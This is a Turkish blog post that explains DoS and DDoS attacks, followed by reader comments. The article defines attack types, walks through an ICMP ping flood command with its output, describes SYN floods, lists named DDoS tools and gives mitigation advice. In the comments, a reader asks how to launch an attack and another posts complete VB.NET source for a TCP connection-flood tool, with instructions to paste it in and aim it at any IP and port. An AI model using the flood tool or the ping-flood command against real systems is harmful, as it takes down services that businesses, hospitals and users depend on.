DDOS/DOS Nedir ? Nasıl Yapılır ? Nasıl Engellenir ?

DOS/DDOS Nedir?

Bilgi güvenliği confidentiality, availability, integrity, yani gizlilik, kullanılabilirlik, erişilebilirlik üzerine kurulmuştur. Bunların herhangi birisindeki zafiyet oluşması durumunda koruduğunuz bilgi tehlike altında olur. DOS/DDoS ise bu üçgende availability kısmına doğru yapılan bir saldırıdır türüdür. DDoS yani Distributed Denial of Service (Dağıtık Hizmet Engelleme) ve DOS (Denial of Service) olarak bilinen bir bilişim suçudur. Bu saldırı türü tamamen bir hizmeti ya da servisi, ulaşılmaz hale getirmeye yönelik yapılır. Bu tür saldırıda hedef hizmete/servisin core altyapısına ya da o hizmete giden yolları tıkınması üzerine olur. Kısaca hedefe giden her yolu engellemeye çalışır.

İster internet bağlantısını yoğunlaştırsın isterse de servisin cevap verme süresini yavaşlatsın amaç gayet nettir. DOS/DDOS Saldırısına gerçek hayatta bir kaç örnek ile benzetmeye çalışırsak, bant genişliği için; 3 saat boyunca 200 km uzunluğundaki 3 şeritli bir otobana saniyede 20 araba sokarak trafiğin akmasını beklemektir. Hizmet veya servise doğru yapılan bir saldırıya gerçek hayata uygun bir örnek verirsek, maksimum 10 ton yük taşıya bilen bir kamyona 50 ton tük koyup kamyonun durduğu yerden kalkamamasıdır. Gerçek hayattan verilen örneklerden sonra bu işin siber ortamda nasıl olduğuna bir örnek vermek istiyorum. KPSS sonuçlarının açıklandığı an ÖSYM sisteminde sorgulama ekranına ulaşmamamız, ulaşsanız bile sonucu görmememizi diyebilirim. Bu durum DDOS’a çok güzel bir örnektir. Aynı anda on binlerce kişi sisteme erişmeye çalışıyor ve sistem bu kadar isteği aynı anda cevap veremez hale geliyor. KPSS sonucunu öğrenmek isteyenler istemeden bir DDOS atağın parçası oluyorlar.

 

DDoS (Distributed Denial of Service) saldırıları temelde DoS ataklarının mantıksal olarak geliştirilmiş tipleri olarak düşünülebilir. DoS saldırılarından farkı birden fazla noktadan tek bir noktaya doğru yapılıyor olmasıdır. DoS saldırıları tekbir noktadan tekbir noktaya doğru yapılır, doğadaki teke tek kavga olarak düşünülebilir ve bunun sonucunda güçlü olan kazanır. DDoS saldırıları ise birden fazla bilgisayarın güçlerini birleştirerek tek bir noktaya saldırmasıdır. “Birlikten kuvvet doğar.” atasözünün teknolojiye kötü niyetli uyarlanmasıdır bir bakıma. Birlik kelimesi DDoS saldırılarında yüzleri, binleri ve yüzbinleri niteleyebilir. Doğal olarak, DDoS saldırılarının ne kadar tehlikeli güçlü ve yıkıcı bir tehdit olabileceğini bazı durumlarda hayal bile edemeyebilirsiniz. – LABİRS TEKNOLOJİ (http://labrisnetworks.com/tr/blog-ddos-nedir/)
For nearly a decade, DDoS (Distributed Denial of Service) was a basic flood attack that simply tried to overwhelm a connection with traffic with the goal of taking that web property offline. DDoS was a basic attack against availability. Arbor Networks (http://www.arbornetworks.com/what-is-ddos )

DDOS ve DOS Arasındaki Fark Nedir?

DOS/DDOS yani Distributed Denial of Service (Dağıtık Hizmet Engelleme) ve DOS (Denial of Service) Arada tek bir fark var. DDOS dağınık olarak yapılan bir saldırı aynı anda yüzlerce binlerce noktadan hedefe yapılan saldırıdır türüdür. Birlikten kuvvet doğar mantığı vardır. DOS atak ise bire bir yapılan saldırıdır türüdür.

DDOS/DOS Nasıl yapılır? Metotları nelerdir?

DDoS atak 3 türde Sınıflandırılabiliriz. Bunlar aşağıdaki gibidir.

1. Volume Based Atak

  • Logical floods
  • ICMP floods
  • Diğer spoofed-packet floods

2. Protokol Atak

  • SYN floods
  • Fragmented packet attacks
  • Ping of Death
  • Smurf DDoS

3. Application Layer Atak

  • Slowloris
  • Zero-day DDoS attacks

Basit DOS/DDOS Atak Örneği

ICMP/PING floods

Aşağıda ICMP/PING floods örnek bir saldırının nasıl yapıldığını göstereceğim.

Hedef sistemin 1 Gbps network bağlantısı olduğunu düşünelim. Ve örnekte verdiğim bilgisayarında bağlantı hızının 10 Mbps olduğunu düşünelim. Normalde Windows bir bilgisayarla ping ping attığımızda 32 byte büyüklüğünde 4 adet ICMP paketi atıyor. Ve toplam atma süresi başarılı bir durumda 3-4 saniye sürüyor. Buda saldırı sayılacak bir girişim olarak görülmez networkte.

ping 192.168.0.1
Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 timePing statistics for 192.168.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 0ms

Bu işlemi root hakkına sahip bir kullanıcı ile Linux da bazı parametreleri ekleyip yaptığımızda ICMP masum bir ping atma olayını çığırından çıkartabiliriz. Nasıl mı? –s komutuyla ICMP paketini 32 den 65535 çıkartarak ve –i parametresi ile de interval sayısını azaltarak iki ICMP paketinin arasındaki süreyi milisaniyeler seviyesine indirelim ve komutumuzu çalıştıralım.

# ping 192.168.1.1 -s 65535 -i .0.1PING 192.168.1.1 : 65535 data bytes
65535 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=0.582 ms
65535 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.655 ms
65535 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.471 ms
65535 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=0.554 ms
65535 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=0.580 ms
65535 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=0.835 ms
65535 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.171 ms
65535 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=1.054 ms



65535 bytes from 192.168.1.1: icmp_seq=378 ttl=64 time=1.873 ms
65535 bytes from 192.168.1.1: icmp_seq=379 ttl=64 time=1.889 ms

Komutu çalıştırdıktan sonra gördüğünüz gibi bir kaç saniye içinde 65535 byte boyutunda 400’e yakın ICMP paketi gönderdik ve networkte yoğun bir trafik yarattık. Bu komutu uzun süreli çalıştırınca hedefteki sisteme erişim uzun bir süre erişimde problem yaşanacaktır. Gerçi örnekte verdiğim değerde bizim yaptığımız saldırı 10 Mbps büyüklüğünde ama hedefinde 1Gbps hattı olduğunu düşünürsek. Saldırıdan diğer kullanıcılar fazla etkilenmez. Tek başımıza bunu yaptığımız için bu DOS ataktır. Birlikten kuvvet doğar deyip, atak yapan bilgisayar sayısını 400’e çıkartalım. Bizimle birlikte 400 bilgisayar bunu yaparsa saldırının şiddeti okadar artar ve bu tür saldırıya da DDOS denir. 400 * 10 Mbps = 4 Gbps bir trafik denir ve buda bizim hedefimizdeki sisteme ait olan bant genişliğinin 4 katı. Bu durumda sisteme erişmek imkansız hale gelir.

Bir diğer saldırı şekli: “SYN floods Attack”

SYN floods Attack

SYN floods saldırısında biraz bahsetmek istiyorum. Normalde network haberleşmesinde Client server’a SYN gönderi Server da buna karşılık SYN-ACK. Bunun sonucunda sunucu kullanıcıdan ACK mesajı bekler. Bekleme süresince session belli bir süre açık kalır. SYN FLOODS yapan saldırgan ACK mesajı göndermez sürekli SYN gönderir. Sunucuda da her SYN mesajı için SYN-ACK gönderir ve yeni bir session açar. Yeterince SYN mesajı gönderildikten sonra artık sunucuların limitleri zorlanır ve yeni session açamaz hale gelir. Bu durumda ise hiç bir isteğe cevap vereme hala gelir.

DOS/DDOS Araçları:

  • 360 Booter GBooter XBL
  • Anonymous High Orbit Ion Cannon
  • BFF DoS (Ping) v1.0
  • BuffMods DDos
  • DarkMagic Flooder
  • DDos V2.0 By Mike12
  • DDoser
  • Desktop Booter
  • DevModding DDos V3
  • DoSHTTP
  • DrBlowFish’s DoS
  • Slayers DDoS V2
  • Hping3 , Hping
  • Loic
  • UDP Flooder By FKN

Nasıl önlem alınır? Nasıl engellenir?

Bu tür bir saldırıyı tespit edebilmek için, öncelikler networkünüzü çok iyi bir şekilde analiz edip gözlemlemeniz lazım. Haftanın hangi günü, günün hangi saatinde ne tür trafik olduğunu bilmelisiniz. Yönettiğiniz sistemin normal trafik değerlerini kesinleştirmeniz lazım. DOS/DDOS atağı sistem networkünüzün en dış ucundaki donanıma gelmeden engellemek gerekiyor. DDoS Mitigation hizmetini bağlı olduğunuz operatörden alabilirsiniz. Bunun avantajı Bandwidth yönünden rahat olması. Saldırı sizin bağlı olduğunuz routera gelmeden engellendiği için saldırı anında bant genişliğinizi rahat rahat kullanabilirsiniz. Yani saldırıyı buluttayken engellersiniz. Bir diğer yöntemde DDoS Mitigation cihazı alarak sisteminizin en dış noktasına entegre etmeniz. Bunun yanında Firewall, Router, Switch, IPS, Load Balancer gibi network ve güvenlik donanımlarının firmwarelerini de güncel tutmanız, olası bir BUG’ı ortandan kaldırır ve bu donanımlara doğru yapılan saldırıları da engellemiş olursunuz. Uygulamanızı çalıştırırken konfigürasyon limitlerinizi dikkatli belirlemeniz lazım. Gerek duymadıkça kullanmadığınız protokolleri kapatın. DMZ yapınız varsa saldırıların içerden de yapılacağını düşünerek internal ve external trafiğini düzenleyin.

Zararı Nelerdir?

Verdiği zarar sunduğunuz hizmete göre değişmektedir. Öncelikle internet bant genişliğini ve serverlar üzerindeki kaynağı boşa harcamış olursunuz. Bir banka sisteminde finansal hizmetlerin durmasını engeller. Hastanelerde hasta kabul işlemlerini durdurur. Telekomünikasyondan telefon ve internet hizmetini alamazsınız. Online satış mağazasında, siteye girişi sağlayamazsınız. Artık sunduğunuz hizmet nekadar kritikse okadar zararda olursunuz. Buda firmanız için kötü bir reklam olur. Kısaca hizmet veremez hale geliyorsunuz.

 

Share

13 comments

  • memet

    peki nasıl atarım onun hakkında bi konu açılırsa iyi olur

    • Mehmet

      DDos araçlarının hepsini anlatma gibi bi şansım yok malesef 🙁

    • 584

      Program Lazım Visual Basic 2012 İndir Ve Console A gir şu kodyu yapıştır

      Imports System.Net
      Imports System.Net.Sockets
      Module Module1

      Sub Main()

      Console.ForegroundColor = ConsoleColor.Red
      Console.Title = “Bourreau DDoS ~ |THT|”
      Console.WriteLine(” [TürkHackTeam] “)
      Console.ForegroundColor = ConsoleColor.DarkGray
      Console.WriteLine(“================================================================================”)
      Console.WriteLine(” => { Coder Bourreau } { Sürüm : 1 } <== ")
      Console.WriteLine("================================================================================")
      Console.ForegroundColor = ConsoleColor.Green
      Console.WriteLine("Web @ İp : ")
      Dim ip As String = Console.ReadLine
      Console.WriteLine("Port (Def 80) :")
      Dim porta As Integer = Console.ReadLine
      Dim x As Integer
      Do
      Try
      Dim iep As IPEndPoint
      iep = New IPEndPoint(IPAddress.Parse(ip), Convert.ToInt32(porta))
      Dim s As Socket = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
      s.Connect(iep)
      s.Close()
      x += 1

      Console.WriteLine("Gönderilen Paket: " & x)
      Catch ex As Exception
      Console.ForegroundColor = ConsoleColor.Red
      Console.WriteLine("Gönderilen Paket: " & x)
      End Try
      Loop
      End Sub
      End Module

    • En Kolay atılma şekli ve en gizli olan Anonymous DoSer’Dir. Bunu internette Araştır Bulursun.Anonymous un Engine’ı dır.

  • ORHAN

    Denge balans ayarı yazılımı bunu da telekom uydunet gibi servis sağlayıcılar bulup geliştirmeli…Kardeşim sistemin kapasitesi ne ise al fazlasını ertele veya reddet,bu yazılım veya cihaz o kadar basit…Önemli zamanlarda iş görür.

  • Pingback: DDoS Saldırıları

  • eren

    inceden bi hackerlık var sende haa 😀

  • ARKADAŞLAR BENİM EVDEKİ MODEM SÜREKLİ ADİL KOTAYI ACTINIZ UYARISI VERİYOR DİYORUM Kİ BENİM EVDEKİPC KÖPRÜ OLARAK BİRİLERİMİ KULANIYOR SALDIRI İÇİN KULANIYOR VARSAYALIMBU TÜR GİRİŞLERİ ENGELLEMEK İÇİN MODEMİN BÜTÜN PORTLARINI KAPATIM BİR TEK 80 PORTU ACIKKALDI AMABU SEFERDE İNTERNET YAVAŞLADI GERCI SÜREKLİ YAVAŞ İNTERNET AMA HİÇ GİRİLMEZ HALE GELİYOR İNTERNE TE BU KÖPRÜLEME YANİ SALDIRANIN BENİM PC VE MODEMİNE GİRMESİNİ NASILENGELLEYE BİLİRİM ACIL YARDIM 2 AYDIR
    1 HAFTA TA 50 GB İNTERNET BİTTİ YOR mail atarsanız sevinirim yada cmd kodlarıyla kapatma yöntemlerini yollayın çokrıca ediyorum . Tşkkler.

  • Baran

    Anlayacağımız dilde kusursuz bi yazı olmuş ellerine sağlık.

  • benim internet siteme son bir haftadır aşırı bir şekilde ddos saldırısı alıyorum ne yaptıysam engelleyemiyorum freewall da var ama yinede site kitleniyor erişemiyorum ne yapacağımı şaşırdım bilen bir arkadaş varsa acil yardıma ihtiyacım var

    • Mehmet

      Selamlar Bayram Bey,

      Hizmet aldığınız servis sağlayıcınızla görüştünüzmü ddos koruması hakkında ?